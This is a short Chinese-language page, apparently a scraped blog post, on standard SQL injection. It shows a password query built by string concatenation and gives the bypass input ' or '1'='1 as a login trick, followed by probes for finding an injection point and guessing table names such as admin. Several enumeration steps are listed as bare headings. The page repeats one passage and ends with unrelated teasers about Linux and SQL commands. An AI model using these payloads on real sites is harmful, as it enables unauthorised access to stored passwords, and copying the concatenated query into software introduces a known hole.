標準注入語
一句有毛病的語句:
sql="select pwd,answer from [member] where userid='"&userid&"' and answer='"&answer&"'"
這麼低階的錯誤也會犯,此時,您只要根據sql構造乙個特殊的使用者名稱和密碼,如:' or '1'='1 一句有毛病的語句:
sql="select pwd,answer from [member] where userid='"&userid&"' and answer='"&answer&"'"
這麼低階的錯誤也會犯,此時,您只要根據sql構造乙個特殊的使用者名稱和密碼,如:' or '1'='1
1.判斷有無注入點
; and 1=1 and 1=2
2.猜表一般的表的名稱無非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判斷是否存在admin這張表
是否支援多句查詢
是否支援子查詢
返回使用者名稱
當前使用者是否為 sysadmin 固定伺服器角色的成員。
當前使用者是否為 db_owner 固定資料庫角色的成員
返回資料庫名
作業系統和sqlserver版本
本地伺服器名稱
收集一些linux命令
有時會用到一些linux命令,可總是記不住,那就記錄下來吧!一 查詢埠被哪個程式占用 netstat anp grep port 其中port是要查詢的埠。比如 netstat anp grep 2033 輸出 tcp 0 00.0.0.0 2033 0.0.0.0 listen 3663 pyth...
一些sql語句
一。在oracle中建表,怎麼實現id自動編號 1 建表 create table code test id int,name varchar2 20 2.建立序列 create sequence s country id increment by 1 start with 1 maxvalue 9...
一些T SQL語句
use dm goif exists select from sysobjects where xtype u and name newtest drop tablenewtest goselectabs len abs asnumberintonewtestfromepsps 2order bya...